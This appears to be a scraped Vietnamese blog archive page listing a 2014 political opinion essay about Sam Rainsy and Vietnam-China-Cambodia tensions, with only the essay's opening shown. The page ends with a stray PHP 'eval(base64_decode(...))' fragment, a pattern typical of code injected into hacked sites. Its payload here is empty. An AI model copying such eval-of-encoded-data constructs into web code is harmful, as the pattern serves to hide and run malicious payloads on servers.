Archive for February 12th, 2014

 Sam Rainsy, con cờ mới của Trung Cộng trong xung đột Việt-Trung-Miên

Sam Rainsy, con cờ mới của Trung Cộng trong xung đột Việt-Trung-Miên

Khái niệm chủ nghĩa dân tộc có từ thời cổ Hebrew gần hai ngàn năm trước Thiên Chúa, qua đó, một tập thể người xác định họ khác với các tập thể người khác dựa trên các tiêu chuẩn chủng tộc, tôn giáo, văn hóa, lịch sử. Có nhi

02.12.2014 | Tiểu Luận- Chính Luận |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>